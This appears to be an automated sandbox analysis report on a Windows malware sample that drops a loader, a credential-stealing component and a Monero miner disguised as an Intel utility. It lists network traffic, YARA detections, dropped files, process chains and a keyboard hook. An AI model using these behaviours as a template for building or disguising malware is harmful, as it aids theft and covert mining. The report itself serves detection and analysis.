Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49866 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49883 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49894 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49910 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49911 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49914 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49932 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49939 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49951 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49979 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49983 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49982 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:50011 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:50026 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:50033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:50040 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:50048 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:50054 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:50077 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to register a low level keyboard hook
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_00408DBB SetWindowsHookExW 00000002,Function_00008D8D,00000000,00000000 7_2_00408DBB

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 31.3.Intel_PTT_EK_Recertification.exe.269bde20000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 31.3.Intel_PTT_EK_Recertification.exe.269bde20000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 32.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 32.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 31.3.Intel_PTT_EK_Recertification.exe.269bde20000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 31.3.Intel_PTT_EK_Recertification.exe.269bde20000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000001F.00000003.2560394914.00000269BDE20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001F.00000003.2560394914.00000269BDE20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects coinmining malware Author: ditekSHen
Binary is likely a compiled AutoIt script file
Source: da3bdc2ac0.exe, 00000026.00000002.2821865455.0000000000792000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_cd8a5a01-4
Source: da3bdc2ac0.exe, 00000026.00000002.2821865455.0000000000792000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_28a25b67-6
Drops password protected ZIP file
Source: file.bin.7.dr Zip Entry: encrypted
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: 847ee125a0.exe.6.dr Static PE information: section name:
Source: 847ee125a0.exe.6.dr Static PE information: section name: .idata
Source: 847ee125a0.exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: 6bf436adc7.exe.6.dr Static PE information: section name:
Source: 6bf436adc7.exe.6.dr Static PE information: section name: .idata
Source: 6bf436adc7.exe.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: .idata
Source: 06c8dc661c.exe.6.dr Static PE information: section name:
Source: 06c8dc661c.exe.6.dr Static PE information: section name: .idata
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_002FCB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 6_2_002FCB97
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_005F96AC: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free, 12_2_005F96AC
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC78BB 0_2_00AC78BB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC8860 0_2_00AC8860
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC7049 0_2_00AC7049
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC31A8 0_2_00AC31A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B98101 0_2_00B98101
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A84B30 0_2_00A84B30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A84DE0 0_2_00A84DE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC2D10 0_2_00AC2D10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC779B 0_2_00AC779B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AB7F36 0_2_00AB7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00328860 1_2_00328860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00327049 1_2_00327049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_003278BB 1_2_003278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_003231A8 1_2_003231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_002E4B30 1_2_002E4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00322D10 1_2_00322D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_002E4DE0 1_2_002E4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00317F36 1_2_00317F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0032779B 1_2_0032779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00328860 2_2_00328860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00327049 2_2_00327049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_003278BB 2_2_003278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_003231A8 2_2_003231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_002E4B30 2_2_002E4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00322D10 2_2_00322D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_002E4DE0 2_2_002E4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00317F36 2_2_00317F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_0032779B 2_2_0032779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_002EE530 6_2_002EE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00306192 6_2_00306192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00328860 6_2_00328860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_002E4B30 6_2_002E4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00322D10 6_2_00322D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_002E4DE0 6_2_002E4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00300E13 6_2_00300E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00327049 6_2_00327049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_003231A8 6_2_003231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00301602 6_2_00301602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0032779B 6_2_0032779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_003278BB 6_2_003278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00303DF1 6_2_00303DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00317F36 6_2_00317F36
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_00405BFC 7_2_00405BFC
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_0040B0E0 7_2_0040B0E0
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_0040B0E4 7_2_0040B0E4
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_00419973 7_2_00419973
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_0040A900 7_2_0040A900
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_0040A270 7_2_0040A270
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_0040AC20 7_2_0040AC20
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_00409C20 7_2_00409C20
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_0040D480 7_2_0040D480
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_0040ED00 7_2_0040ED00
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_00409DD0 7_2_00409DD0
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_00419601 7_2_00419601
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_004196DB 7_2_004196DB
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_00418F40 7_2_00418F40
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_0061F13E 12_2_0061F13E
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_00615458 12_2_00615458
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_006124C0 12_2_006124C0
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_006147AC 12_2_006147AC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_00638817 12_2_00638817
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_00600DCC 12_2_00600DCC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_005FB114 12_2_005FB114
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_005FF1B4 12_2_005FF1B4
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_0060C278 12_2_0060C278
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_00622578 12_2_00622578
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_00633528 12_2_00633528
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_0062066E 12_2_0062066E
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_0061D66C 12_2_0061D66C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_0060D858 12_2_0060D858
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_0061694C 12_2_0061694C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_006279DC 12_2_006279DC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_006349A5 12_2_006349A5
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_006299B8 12_2_006299B8
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_0063DA30 12_2_0063DA30
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_0062FA0C 12_2_0062FA0C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_00607C68 12_2_00607C68
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_0063DC11 12_2_0063DC11
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_00608CA8 12_2_00608CA8
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_0063DD00 12_2_0063DD00
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_00616E08 12_2_00616E08
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_0060AF58 12_2_0060AF58
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_005F8F18 12_2_005F8F18
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe A8380F919786723AED283E0A8EB39DD045EDF44F198037253D8FCAC17A03147D
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe 3B83BA98959F8B8C013D6B6FE94B17C5DE99B1A798DA2F5B33A2C3BE6E9B18B6
Enables security privileges
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Process token adjusted: Security Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: String function: 004029A6 appears 44 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00A980C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 002F7A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 002F80C0 appears 393 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 002FD64E appears 79 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00318E10 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 002FD663 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 002FD942 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 002FDF80 appears 81 times
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 31.3.Intel_PTT_EK_Recertification.exe.269bde20000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 31.3.Intel_PTT_EK_Recertification.exe.269bde20000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 32.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 32.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 31.3.Intel_PTT_EK_Recertification.exe.269bde20000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 31.3.Intel_PTT_EK_Recertification.exe.269bde20000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000001F.00000003.2560394914.00000269BDE20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0000001F.00000003.2560394914.00000269BDE20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: random[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9975940743944637
Source: random[1].exe.6.dr Static PE information: Section: beewzkou ZLIB complexity 0.994259854752191
Source: 847ee125a0.exe.6.dr Static PE information: Section: ZLIB complexity 0.9975940743944637
Source: 847ee125a0.exe.6.dr Static PE information: Section: beewzkou ZLIB complexity 0.994259854752191
Source: random[1].exe0.6.dr Static PE information: Section: jmepqeib ZLIB complexity 0.9946851218731163
Source: 6bf436adc7.exe.6.dr Static PE information: Section: jmepqeib ZLIB complexity 0.9946851218731163
Source: random[1].exe2.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 06c8dc661c.exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.mine.winEXE@90/57@65/13
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_00409606 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree, 7_2_00409606
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_005FAC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 12_2_005FAC74
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_00601D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle, 12_2_00601D04
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_0040122A GetDiskFreeSpaceExW,SendMessageW, 7_2_0040122A
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_004092C1 GetDlgItem,GetDlgItem,SendMessageW,GetDlgItem,GetWindowLongW,GetDlgItem,SetWindowLongW,GetSystemMenu,EnableMenuItem,GetDlgItem,SetFocus,SetTimer,CoCreateInstance,GetDlgItem,IsWindow,GetDlgItem,EnableWindow,GetDlgItem,ShowWindow, 7_2_004092C1
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_004020BF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress, 7_2_004020BF
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\C1J7SVw[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2140:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6024:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2172:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1136:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5600:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6180:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3084:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 847ee125a0.exe, 00000024.00000003.2628720995.0000000005524000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2652261481.00000000054F1000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2790026546.00000000056E4000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2820094981.00000000056B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 57%
Source: file.exe Virustotal: Detection: 58%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 847ee125a0.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
